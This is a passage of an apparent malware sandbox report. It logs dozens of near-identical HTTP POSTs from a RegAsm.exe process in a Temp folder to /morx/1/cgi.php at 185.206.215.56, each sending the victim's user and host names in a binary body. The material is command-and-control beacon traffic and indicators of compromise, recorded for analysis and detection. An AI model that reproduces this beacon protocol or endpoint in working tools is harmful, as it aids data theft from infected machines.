                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:28.574281931 CET1210OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:28.661950111 CET1211INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:27 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        53192.168.2.2249220185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:28.880701065 CET1211OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:28.949122906 CET1212OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:29.048592091 CET1212INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:28 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        54192.168.2.2249221185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:29.244494915 CET1213OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:29.324312925 CET1213OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:29.409620047 CET1213INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:28 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        55192.168.2.2249222185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:29.630363941 CET1214OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:29.699589014 CET1214OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:29.797473907 CET1215INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:28 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        56192.168.2.2249223185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:30.014888048 CET1215OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:30.089708090 CET1216OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:30.193197012 CET1216INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:29 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        57192.168.2.2249224185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:30.409914970 CET1217OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:30.480485916 CET1217OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:30.572042942 CET1217INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:29 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        58192.168.2.2249225185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:30.786520004 CET1218OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:30.855289936 CET1218OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:30.947633028 CET1219INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        59192.168.2.2249226185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:31.159641027 CET1219OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:31.230292082 CET1220OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:31.319802046 CET1220INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        6192.168.2.2249173185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:09.669670105 CET1149OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:09.749500036 CET1150OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:09.843837023 CET1150INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        60192.168.2.2249227185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:31.542985916 CET1221OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:31.605285883 CET1221OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:31.697483063 CET1221INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        61192.168.2.2249228185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:31.903232098 CET1222OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:31.964823008 CET1222OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:32.053069115 CET1223INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        62192.168.2.2249229185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:32.262785912 CET1223OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:32.324218988 CET1223OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:32.426687956 CET1224INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        63192.168.2.2249230185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:32.647726059 CET1225OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:32.717231035 CET1225OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:32.815516949 CET1225INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        64192.168.2.2249231185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:33.031393051 CET1226OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:33.105528116 CET1226OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:33.190809965 CET1226INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:32 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        65192.168.2.2249232185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:33.398943901 CET1227OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:33.465138912 CET1227OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:33.560619116 CET1228INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:32 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        66192.168.2.2249233185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:33.770155907 CET1229OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:33.839715004 CET1229OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:33.939742088 CET1229INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        67192.168.2.2249234185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:34.165365934 CET1230OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:34.246052027 CET1230OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:34.334827900 CET1230INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        68192.168.2.2249235185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:34.564013004 CET1231OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
